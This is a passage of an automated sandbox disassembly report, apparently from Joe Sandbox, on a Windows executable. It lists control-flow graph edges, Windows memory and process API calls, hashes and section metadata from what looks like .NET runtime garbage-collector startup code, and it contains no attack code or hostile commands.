7ff7e359dce6 17655 7ff7e359e056 17654->17655 17654->17661 17790 7ff7e35a1470 17654->17790 17656 7ff7e35a1470 9 API calls 17655->17656 17657 7ff7e359e089 17656->17657 17658 7ff7e35a1470 9 API calls 17657->17658 17657->17661 17659 7ff7e359e0c8 17658->17659 17660 7ff7e35d8e70 _swprintf_c_l 3 API calls 17659->17660 17659->17661 17662 7ff7e359e391 17660->17662 17661->17576 17662->17661 17663 7ff7e359e3f4 17662->17663 17664 7ff7e359e3dd 17662->17664 17665 7ff7e35d8e70 _swprintf_c_l 3 API calls 17663->17665 17664->17661 17667 7ff7e359e3ea DebugBreak 17664->17667 17666 7ff7e359e440 17665->17666 17666->17661 17668 7ff7e35d8e70 _swprintf_c_l 3 API calls 17666->17668 17667->17661 17669 7ff7e359e4cd 17668->17669 17669->17661 17804 7ff7e35824a0 InitializeCriticalSection 17669->17804 17672 7ff7e3582739 17671->17672 17673 7ff7e3582721 VirtualFree 17671->17673 17672->17622 17673->17622 17675 7ff7e35b024f 17674->17675 17676 7ff7e35b0272 17675->17676 17677 7ff7e35b027c 17675->17677 17683 7ff7e35b02a7 17675->17683 17749 7ff7e3582890 17676->17749 17679 7ff7e3582810 3 API calls 17677->17679 17681 7ff7e35b028d 17679->17681 17681->17683 17760 7ff7e35827f0 VirtualFree 17681->17760 17683->17627 17686 7ff7e359f16f 17684->17686 17687 7ff7e359f18c 17686->17687 17761 7ff7e3581d80 17686->17761 17687->17629 17689 7ff7e359cc42 17688->17689 17690 7ff7e35d8e50 8 API calls 17689->17690 17691 7ff7e359cd63 17690->17691 17692 7ff7e3582810 17691->17692 17693 7ff7e3582835 VirtualAlloc 17692->17693 17694 7ff7e3582854 GetCurrentProcess VirtualAllocExNuma 17692->17694 17693->17694 17694->17633 17699 7ff7e359f91e 17695->17699 17696 7ff7e359f928 17697 7ff7e35d8e50 8 API calls 17696->17697 17698 7ff7e359f734 17697->17698 17698->17636 17698->17638 17699->17696 17700 7ff7e359fcd3 EnterCriticalSection 17699->17700 17701 7ff7e359fd00 LeaveCriticalSection 17699->17701 17703 7ff7e359fdf1 LeaveCriticalSection 17699->17703 17704 7ff7e359fdc7 17699->17704 17768 7ff7e3582740 17699->17768 17700->17699 17700->17701 17701->17699 17706 7ff7e359fdfd 17703->17706 17705 7ff7e359fdd0 EnterCriticalSection 17704->17705 17704->17706 17705->17703 17706->17696 17708 7ff7e359fe35 EnterCriticalSection LeaveCriticalSection 17706->17708 17771 7ff7e35827d0 VirtualFree 17706->17771 17708->17706 17772 7ff7e35b2dc0 17709->17772 17712 7ff7e359eb10 17719 7ff7e359eb40 17712->17719 17713 7ff7e359f121 17787 7ff7e3581c20 CloseHandle 17713->17787 17714 7ff7e359f12d 17716 7ff7e359f142 17714->17716 17717 7ff7e359f136 17714->17717 17716->17642 17788 7ff7e3581c20 CloseHandle 17717->17788 17720 7ff7e3581cc0 4 API calls 17719->17720 17745 7ff7e359eb9f 17719->17745 17721 7ff7e359ebdf 17720->17721 17722 7ff7e3581cc0 4 API calls 17721->17722 17721->17745 17723 7ff7e359ebf5 _swprintf_c_l 17722->17723 17724 7ff7e3581e90 10 API calls 17723->17724 17723->17745 17725 7ff7e359ef1a 17724->17725 17726 7ff7e3581cc0 4 API calls 17725->17726 17727 7ff7e359ef97 17726->17727 17730 7ff7e3581cc0 4 API calls 17727->17730 17744 7ff7e359efd9 17727->17744 17728 7ff7e359f0d9 17732 7ff7e359f0e2 17728->17732 17733 7ff7e359f0ee 17728->17733 17729 7ff7e359f0cd 17783 7ff7e3581c20 CloseHandle 17729->17783 17734 7ff7e359efad 17730->17734 17784 7ff7e3581c20 CloseHandle 17732->17784 17736 7ff7e359f103 17733->17736 17737 7ff7e359f0f7 17733->17737 17734->17744 17778 7ff7e3581c40 17734->17778 17740 7ff7e359f10c 17736->17740 17736->17745 17785 7ff7e3581c20 CloseHandle 17737->17785 17786 7ff7e3581c20 CloseHandle 17740->17786 17742 7ff7e359efc3 17743 7ff7e3581cc0 4 API calls 17742->17743 17742->17744 17743->17744 17744->17728 17744->17729 17744->17745 17745->17713 17745->17714 17746 7ff7e359f087 17745->17746 17746->17642 17747->17623 17748->17642 17750 7ff7e35828be LookupPrivilegeValueW 17749->17750 17751 7ff7e3582956 GetLargePageMinimum 17749->17751 17752 7ff7e35828da GetCurrentProcess OpenProcessToken 17750->17752 17753 7ff7e358298f 17750->17753 17754 7ff7e3582976 VirtualAlloc 17751->17754 17755 7ff7e3582993 GetCurrentProcess VirtualAllocExNuma 17751->17755 17752->17753 17756 7ff7e3582911 AdjustTokenPrivileges GetLastError CloseHandle 17752->17756 17757 7ff7e35d8e50 8 API calls 17753->17757 17754->17753 17755->17753 17756->17753 17758 7ff7e358294b 17756->17758 17759 7ff7e35829c6 17757->17759 17758->17751 17758->17753 17759->17681 17760->17683 17762 7ff7e3581d88 17761->17762 17763 7ff7e3581da1 GetLogicalProcessorInformation 17762->17763 17767 7ff7e3581dcd ISource 17762->17767 17764 7ff7e3581dd4 17763->17764 17765 7ff7e3581dc2 GetLastError 17763->17765 17766 7ff7e3581e11 GetLogicalProcessorInformation 17764->17766 17764->17767 17765->17764 17765->17767 17766->17767 17767->17687 17769 7ff7e358277e GetCurrentProcess VirtualAllocExNuma 17768->17769 17770 7ff7e358275b VirtualAlloc 17768->17770 17769->17699 17770->17699 17771->17706 17773 7ff7e35b2dd9 17772->17773 17777 7ff7e359f8ac 17772->17777 17774 7ff7e35b2df4 LoadLibraryExW 17773->17774 17773->17777 17775 7ff7e35b2e22 GetProcAddress 17774->17775 17774->17777 17776 7ff7e35b2e37 17775->17776 17776->17777 17777->17712 17779 7ff7e35d8e70 _swprintf_c_l 3 API calls 17778->17779 17780 7ff7e3581c66 17779->17780 17781 7ff7e3581c6e CreateEventW 17780->17781 17782 7ff7e3581c8e ISource 17780->17782 17781->17782 17782->17742 17783->17728 17784->17733 17785->17736 17786->17745 17787->17714 17788->17716 17789->17654 17792 7ff7e35a149d 17790->17792 17791 7ff7e35a14f3 EnterCriticalSection 17795 7ff7e35a1510 17791->17795 17792->17791 17793 7ff7e35a1577 17792->17793 17796 7ff7e35a15d1 17793->17796 17800 7ff7e3582740 3 API calls 17793->17800 17794 7ff7e35a15c1 LeaveCriticalSection 17797 7ff7e35a15cd 17794->17797 17795->17794 17799 7ff7e35a1555 LeaveCriticalSection 17795->17799 17805 7ff7e359e5b0 17796->17805 17797->17654 17799->17793 17801 7ff7e35a159d 17800->17801 17801->17796 17802 7ff7e35a15a1 17801->17802 17802->17797 17803 7ff7e35a15ab EnterCriticalSection 17802->17803 17803->17794 17804->17661 17807 7ff7e359e5e1 17805->17807 17806 7ff7e359e775 17806->17797 17807->17806 17808 7ff7e359e75f DebugBreak 17807->17808 17809 7ff7e359e764 17807->17809 17808->17809 17809->17806 17810 7ff7e359e770 DebugBreak 17809->17810 17810->17806 17811->17581 17813 7ff7e357b165 SetThreadPriority ResumeThread FindCloseChangeNotification 17812->17813 17814 7ff7e357b15f 17812->17814 17813->17583 17814->17583 17817 7ff7e3584193 _swprintf_c_l 17815->17817 17816 7ff7e35841b9 ISource _swprintf_c_l 17816->17590 17817->17816 17824 7ff7e3585110 17817->17824 17819 7ff7e35841b0 17819->17816 17820 7ff7e357b220 InitializeCriticalSectionEx 17819->17820 17820->17816 17822 7ff7e357b200 DeleteCriticalSection 17821->17822 17823 7ff7e3584402 17822->17823 17825 7ff7e3582810 3 API calls 17824->17825 17826 7ff7e3585132 17825->17826 17827 7ff7e358513a 17826->17827 17828 7ff7e3582740 3 API calls 17826->17828 17827->17819 17829 7ff7e3585158 17828->17829 17832 7ff7e3585163 _swprintf_c_l 17829->17832 17833 7ff7e35827f0 VirtualFree 17829->17833 17831 7ff7e358527e 17831->17819 17832->17819 17833->17831 17835 7ff7e357affe GetProcAddress 17834->17835 17836 7ff7e357b013 17834->17836 17835->17836 17836->17396 17838 7ff7e357afae GetProcAddress 17837->17838 17839 7ff7e357afc3 17837->17839 17838->17839 17839->17398 18232 7ff7e3572310 18234 7ff7e3572320 18232->18234 18233 7ff7e3572359 18234->18233 18235 7ff7e35725d0 17 API calls 18234->18235 18236 7ff7e362c971 18235->18236 18237 7ff7e362cb00 17 API calls 18236->18237 18238 7ff7e362ca3d 18237->18238

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7E357AE5A), ref: 00007FF7E35824CF
                                                        • GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7E357AE5A), ref: 00007FF7E358250D
                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7E357AE5A), ref: 00007FF7E3582539
                                                        • GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7E357AE5A), ref: 00007FF7E358254A
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7E357AE5A), ref: 00007FF7E3582559
                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7E357AE5A), ref: 00007FF7E35825F0
                                                        • GetProcessAffinityMask.KERNEL32 ref: 00007FF7E3582603
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                                                        • String ID:
                                                        • API String ID: 580471860-0
                                                        • Opcode ID: 7ecf9e13a330afa06f8beef30d834f864ee4498cc9ed1855e1d3942379770bb5
                                                        • Instruction ID: 9386393e204e6fec79bb729bb24309745dd2cf1abab1e21469f1d711b4301443
                                                        • Opcode Fuzzy Hash: 7ecf9e13a330afa06f8beef30d834f864ee4498cc9ed1855e1d3942379770bb5
                                                        • Instruction Fuzzy Hash: FE516D71A0D74686EA90AF25E440369BFA1EB48781FC40133D94DAB354DE3DE514CB22

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00007FF7E357AE30: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E35755CB), ref: 00007FF7E357AE3B
                                                          • Part of subcall function 00007FF7E357AE30: QueryInformationJobObject.KERNEL32 ref: 00007FF7E357AF0E
                                                          • Part of subcall function 00007FF7E357ACD0: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF7E3573699), ref: 00007FF7E357ACE1
                                                        • RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF7E3575638
                                                          • Part of subcall function 00007FF7E357D5C0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7E357D6BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocExceptionHandleHandlerInformationModuleObjectQueryVectored_wcsicmp
                                                        • String ID: StressLogLevel$TotalStressLogSize
                                                        • API String ID: 2876344857-4058818204
                                                        • Opcode ID: 45dc59bb53227d1381efa592a7d616e654f0d65a7567b6ffba862109cea427b1
                                                        • Instruction ID: 8a558ea59f5320ca02f5f776b26350148aba68ee20914891c43331593aa1e0bd
                                                        • Opcode Fuzzy Hash: 45dc59bb53227d1381efa592a7d616e654f0d65a7567b6ffba862109cea427b1
                                                        • Instruction Fuzzy Hash: 5041A43290864681EAD0BF30E4417B9EBA1AF85785FC50033E94D37796DE3CE605C762

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 346 7ff7e3588f50-7ff7e3588f7e call 7ff7e357de30 call 7ff7e35826b0 351 7ff7e3588f80-7ff7e3588f85 346->351 352 7ff7e3588f87-7ff7e3588f95 346->352 353 7ff7e3588f99-7ff7e3588fe7 call 7ff7e3579b20 call 7ff7e3582280 call 7ff7e3583690 351->353 352->353 360 7ff7e3588ff9-7ff7e3589000 call 7ff7e3582070 353->360 361 7ff7e3588fe9-7ff7e3588ff7 353->361 365 7ff7e3589005 360->365 362 7ff7e358900c-7ff7e3589088 call 7ff7e35835a0 call 7ff7e3583600 call 7ff7e35835b0 call 7ff7e35835d0 call 7ff7e3583630 361->362 375 7ff7e358918e-7ff7e3589198 362->375 376 7ff7e358908e-7ff7e3589095 362->376 365->362 378 7ff7e358963d-7ff7e3589653 375->378 379 7ff7e358919e-7ff7e35891a5 375->379 377 7ff7e358909b-7ff7e35890a2 376->377 376->378 377->378 380 7ff7e35890a8-7ff7e35890c2 call 7ff7e3583610 call 7ff7e35835c0 call 7ff7e35835e0 377->380 381 7ff7e35891a9-7ff7e35891ac 379->381 404 7ff7e35890ef-7ff7e35890f5 380->404 405 7ff7e35890c4-7ff7e35890c6 380->405 383 7ff7e35891b3-7ff7e35891b6 381->383 384 7ff7e35891b8-7ff7e35891bb 383->384 385 7ff7e35891ca-7ff7e35891cd 383->385 384->385 388 7ff7e35891bd-7ff7e35891c4 384->388 389 7ff7e35891cf-7ff7e35891e1 call 7ff7e35835f0 385->389 390 7ff7e3589246 385->390 388->378 388->385 400 7ff7e35891e3-7ff7e3589203 389->400 401 7ff7e3589205 389->401 393 7ff7e358924d-7ff7e3589250 390->393 396 7ff7e3589272-7ff7e358928d call 7ff7e3583670 393->396 397 7ff7e3589252-7ff7e3589259 393->397 407 7ff7e358928f-7ff7e3589299 396->407 408 7ff7e35892e1-7ff7e35892f9 call 7ff7e3583d60 call 7ff7e3583d80 396->408 397->396 402 7ff7e358925b-7ff7e3589271 397->402 406 7ff7e358920c-7ff7e358920f 400->406 401->406 404->378 410 7ff7e35890fb-7ff7e3589101 404->410 405->378 409 7ff7e35890cc-7ff7e35890cf 405->409 406->390 411 7ff7e3589211-7ff7e3589218 406->411 412 7ff7e35892b3-7ff7e35892ca 407->412 413 7ff7e358929b-7ff7e35892a2 407->413 427 7ff7e35892fb-7ff7e3589306 call 7ff7e3583710 408->427 428 7ff7e358934c-7ff7e3589366 call 7ff7e3583710 408->428 409->378 414 7ff7e35890d5-7ff7e35890ea 409->414 410->378 415 7ff7e3589107-7ff7e358910b 410->415 411->397 417 7ff7e358921a-7ff7e3589244 411->417 419 7ff7e35892ce-7ff7e35892da 412->419 418 7ff7e35892a4-7ff7e35892a6 413->418 413->419 414->383 415->378 420 7ff7e3589111-7ff7e358911a 415->420 417->393 422 7ff7e35892a8-7ff7e35892ab 418->422 423 7ff7e35892ad-7ff7e35892b1 418->423 419->408 420->378 424 7ff7e3589120-7ff7e358918c 420->424 422->419 423->419 424->381 433 7ff7e3589313-7ff7e3589338 call 7ff7e358b6d0 427->433 434 7ff7e3589308-7ff7e3589310 call 7ff7e358b720 427->434 440 7ff7e3589368-7ff7e3589378 428->440 441 7ff7e358937c-7ff7e3589388 428->441 444 7ff7e3589399-7ff7e35893c9 call 7ff7e3583d70 call 7ff7e3583560 call 7ff7e3583680 433->444 445 7ff7e358933a-7ff7e358934a call 7ff7e358b6d0 433->445 434->433 440->441 442 7ff7e3589391-7ff7e3589396 441->442 443 7ff7e358938a-7ff7e358938f 441->443 442->444 443->444 454 7ff7e35893e7-7ff7e35893f1 444->454 455 7ff7e35893cb-7ff7e35893e6 444->455 445->444 456 7ff7e35893f3-7ff7e35893ff 454->456 457 7ff7e358941d-7ff7e3589424 454->457 460 7ff7e3589401-7ff7e3589404 456->460 461 7ff7e3589406-7ff7e358941b 456->461 458 7ff7e3589633 457->458 459 7ff7e358942a-7ff7e3589431 457->459 458->378 459->458 462 7ff7e3589437-7ff7e3589457 call 7ff7e359f450 459->462 460->459 461->459 464 7ff7e358945c-7ff7e3589490 call 7ff7e3583d20 call 7ff7e3583d50 call 7ff7e3583d30 call 7ff7e3583d40 462->464 473 7ff7e3589625 464->473 474 7ff7e3589496-7ff7e35894cd call 7ff7e3583620 464->474 476 7ff7e358962c 473->476 478 7ff7e35894cf-7ff7e35894ec 474->478 479 7ff7e35894ee-7ff7e3589504 474->479 476->458 480 7ff7e358953e-7ff7e3589551 478->480 481 7ff7e3589532-7ff7e358953c 479->481 482 7ff7e3589506-7ff7e3589530 479->482 483 7ff7e3589553-7ff7e358955c 480->483 484 7ff7e358955e 480->484 481->480 482->481 485 7ff7e3589564-7ff7e3589595 call 7ff7e3583660 call 7ff7e35d8e70 483->485 484->485 485->476 490 7ff7e358959b-7ff7e35895ad call 7ff7e3581c00 485->490 490->458 493 7ff7e35895b3-7ff7e35895bf call 7ff7e3581cc0 490->493 496 7ff7e35895c1-7ff7e35895cd call 7ff7e3574a30 493->496 497 7ff7e35895d7-7ff7e358960a call 7ff7e359dc30 493->497 496->497 502 7ff7e3589611-7ff7e3589614 497->502 503 7ff7e358960c call 7ff7e35d8dac 497->503 502->473 505 7ff7e3589616-7ff7e3589620 call 7ff7e35b28b0 call 7ff7e3574a30 502->505 503->502 505->473
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
                                                        • String ID: Creation of WaitForGCEvent failed$TraceGC is not turned on
                                                        • API String ID: 133006248-518909315
                                                        • Opcode ID: 542490f3281f9ec5935c23756829aefb1db30947c7d8b3d75492c27f59141b81
                                                        • Instruction ID: c0760aeb5d37769148051a0f4e1050780151ba5b65e315c2352c7f46d0e0196e
                                                        • Opcode Fuzzy Hash: 542490f3281f9ec5935c23756829aefb1db30947c7d8b3d75492c27f59141b81
                                                        • Instruction Fuzzy Hash: 7C026520E0D64781FAD5FB31A895374FA95AF48782F85413BDC0E6B791DE3CA4608363
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CurrentProcess
                                                        • String ID:
                                                        • API String ID: 2050909247-0
                                                        • Opcode ID: dcdec6c9ce47749d2baf7434945b974f160bd7965fc480561c7d017017f294f8
                                                        • Instruction ID: 48aa41f20a8d38345e32670f583147a532e09da9391603fe3a558a8904d65e77
                                                        • Opcode Fuzzy Hash: dcdec6c9ce47749d2baf7434945b974f160bd7965fc480561c7d017017f294f8
                                                        • Instruction Fuzzy Hash: 0302A060E1C70686FAD5AB25A490738FFA1AF49786F848637C81D77360DF3CB460D662
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7991890c23ebfd116d6d55ec6519a96bce7942f49d77f7d95a4840feb3b64dca
                                                        • Instruction ID: d6bee82858ac812cc73bdf6d4e35dcd50ab8009590ae74c1f56ef7e93323b6a2
                                                        • Opcode Fuzzy Hash: 7991890c23ebfd116d6d55ec6519a96bce7942f49d77f7d95a4840feb3b64dca
                                                        • Instruction Fuzzy Hash: 3AF16F20D1DA4685F6C1FB34A991374FA616F99382FD49237D81D353A2EF3CA4B18262

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                                                        • String ID: @$@$@
                                                        • API String ID: 2645093340-1177533131
                                                        • Opcode ID: f97ad304849a1431e4f3e87175d7cbd2d95d287c41a756e0b52c30f8d3b71cfe
                                                        • Instruction ID: c51383b5aa20cc214f4c2cff968b0ed67dc615c809f66d0d296e3ad432ea59fb
                                                        • Opcode Fuzzy Hash: f97ad304849a1431e4f3e87175d7cbd2d95d287c41a756e0b52c30f8d3b71cfe
                                                        • Instruction Fuzzy Hash: F85134327097C185EBB19F21E4503AAFBA0FB88B50F944636CA9D57B98CF7CD4458B11

                                                        Control-flow Graph

                                                        APIs
                                                        • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E35755CB), ref: 00007FF7E357AE3B
                                                          • Part of subcall function 00007FF7E35824C0: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7E357AE5A), ref: 00007FF7E35824CF
                                                          • Part of subcall function 00007FF7E35824C0: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7E357AE5A), ref: 00007FF7E358250D
                                                          • Part of subcall function 00007FF7E35824C0: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7E357AE5A), ref: 00007FF7E3582539
                                                          • Part of subcall function 00007FF7E35824C0: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7E357AE5A), ref: 00007FF7E358254A
                                                          • Part of subcall function 00007FF7E35824C0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7E357AE5A), ref: 00007FF7E3582559
                                                          • Part of subcall function 00007FF7E357D5C0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7E357D6BD
                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E35755CB), ref: 00007FF7E357AEAA
                                                        • GetProcessAffinityMask.KERNEL32 ref: 00007FF7E357AEBD
                                                        • QueryInformationJobObject.KERNEL32 ref: 00007FF7E357AF0E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem_wcsicmp
                                                        • String ID: PROCESSOR_COUNT
                                                        • API String ID: 296690692-4048346908
                                                        • Opcode ID: b270e94377580d3288a1bcf3e941d1207372f9dfc2ea9df1a3f3ba46b40a03d9
                                                        • Instruction ID: 1ca0515319ce804d510d40eb45631e8a802bf78659f9fcbb1e332068596548c4
                                                        • Opcode Fuzzy Hash: b270e94377580d3288a1bcf3e941d1207372f9dfc2ea9df1a3f3ba46b40a03d9
                                                        • Instruction Fuzzy Hash: FA318271A1864386EBD4BB65D8803B9EB91EF84355FC00033E64D67795DE3CE6498722

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF7E3576586
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFailFastRaise$Sleep
